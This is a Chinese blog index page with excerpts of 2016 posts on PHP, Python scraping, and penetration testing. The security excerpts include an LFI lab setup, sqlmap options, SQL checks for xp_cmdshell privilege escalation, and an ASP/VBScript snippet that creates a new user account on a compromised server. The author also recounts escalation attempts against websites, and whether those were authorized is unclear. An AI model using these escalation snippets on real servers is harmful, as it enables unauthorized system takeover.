- 博客(18)
- 资源 (1)
- 收藏
- 关注
原创 [PHP]搭建Laravel心路历程
经过了2小时左右总算是把环境搭好了,其实很简单,只是中间绕过的弯很多从前一直对框架没有一个清晰的认识,经过此次学习才清晰认识到框架就是一个搭好结构的代码,让你去填补初学还是不应该接触框架,多写之后再谈框架
2016-09-14 01:07:34 362
原创 [LFI]Phpinfo本地文件包含漏洞环境搭建分析
0x00本地文件包含漏洞即网站未对用户可控变量进行控制,导致用户可以控制包含变量。0x01参考wooyun上的教程中遇到问题如下:Can not connect to the docker deamon权限不够,docker未提示,指令前加sudosudo docker run –rm -p “8901:80” janes/lfi_phpinfo8901为本机端口
2016-08-29 23:44:09 4581
原创 Wooyun最新确认漏洞爬虫V0.02
Wooyun最新确认漏洞爬虫v0.02#coding:utf-8import requestsimport refrom bs4 import BeautifulSoupwooyun_confirm='http://www.wooyun.org/bugs/new_confirm'wooyun_url='http://www.wooyun.org'wooyun_url_result=re.
2016-05-22 15:48:20 1571
原创 [python爬虫]爬取贴吧某页美女图片+爬取糗百美女图片
#coding:utf-8import requests,pyquery,urllibimport redef get_html(url): html=urllib.urlopen(url).read() return htmldef get_image(html): reg=r'src="(.*?\.jpg)"' #html=requests.get(url).read()
2016-05-18 22:08:56 573
原创 [Python2.7]python关于sys.agrv的使用
sys.argv是你接收的参数的列表 []比如你这段代码名字叫做test.py 运行python test.py 192.168.0.1 test.txtsys.argv[0] ----test.pysys.argv[1] ----192.168.0.1sys.argv[2] ----test.txt
2016-04-27 23:10:07 462
转载 [渗透测试]Sqlmap使用参数说明
SQLMAP参数介绍sqlmap的使用方式:python sqlmap.py [options];sqlmap中一共有以下十六个选项卡:帮助选项卡;Target(目标选项卡);Request(请求选项卡);Optimization(优化选项卡);Injection(注射选项卡);Detection(探测选项卡);Techniques(注入技术选项卡);Fingerpri
2016-04-04 12:06:45 5677
原创 [渗透测试]XML注入
今天想研究一下,传说中的XML注入,下载了一套有漏洞的网站源码,搭好之后发现并不知道怎么利用这个漏洞,网上的看不懂故先占坑。
2016-04-04 00:05:46 854
原创 [博弈游戏]Euclid's Game(0099)-SWUST_OJ
DescriptionStarts with two unequal positive numbers (M,N and M>N) on the board. Two players move in turn. On each move, a player has to write on the board a positive number equal to the difference
2016-04-02 21:13:53 710
原创 [渗透测试]扫目录,Sqlmap利用均超时,利用dirb扫描
今天碰到一个网友传来的Webshell地址,问我对方如何取得webshell。网站为阿里云服务器,存在明显的注入漏洞,但是任何语句都会令网页报错,sqlmap一直超时,御剑扫描目录1个线程也会导致被屏蔽IP。经一学长提点,利用kali中的dirb工具搜索目录,顺利找到后台,却始终找不到方法注入.同时也不明白为什么dirb扫描目录就不会被屏蔽 。 郁呀.......
2016-03-31 23:37:52 4348
原创 2016-3-31 提权一直在失败从未成功
今天又提了两个网站的权(尝试),又失败了,一个只要运行命令就提示组策略阻止,另一个就是net user无法运行,溢出exp,pr,巴西烤肉都上了,还是不行。自己还是无法找出服务器的Mysql的账号密码在哪,大马的搜索功能有问题。明天尝试一下远控连接shell
2016-03-31 00:07:43 402
原创 [提权禁区] SQL语句利用xp_cmdshell获取权限
判断权限是不是saselect is_srvrolemember('sysadmin')返回是1说明是sa判断xp_cmdshell扩展存储是否存在select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'返回为l则证明存在判
2016-03-27 00:53:50 1433
原创 [提权禁区]利用vbs添加管理员用户
新建一个asp文件,输入代码,然后访问即可Set onlineServer=GetObject("WinNT://127.0.0.1")Set newuser=onlineServer.Create("user","misya")NewUser.SetPassword "misaya"NewUser.FullName="misaya test"NewUser.Descr
2016-03-26 15:31:50 1050
原创 [python]int函数带参用法
print (int(2.0))>>2若int(x,base)中base无,则int(2.0)即为将x转化为整形数字. 若int(x,base)中base有参数,则x一定为字符串例如:print (int('101',2))>>5此处2指的是101为2进制数,int()函数则是将其转化为10进制数进行输出
2016-03-23 18:20:13 1048
原创 [python]安装BeautifulSoup遇到问题
安装BeautifulSoup,结果利用语句from bs4 import BeautifulSoup时一直报错,网上问答都没有相似情况最后看到了BeautifulSoup官方文档是因为用py3编译py2代码的原因,所下载的BeautifulSoup是py2的,文档说会自动转换代码,不知为什么没有自己转换下次遇到问题最好先翻官方文档,毕竟百度
2016-03-23 13:03:47 487
原创 [python]Python中from...import与import......as与with.....as
from...import与import区别在于import直接导入指定的库,而from....import则是从指定的库中导入指定的模块import...as则是将import A as B,给予A库一个B的别称,帮助记忆with....as具体不太清楚,可以减少复杂度
2016-03-22 23:59:58 1735
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人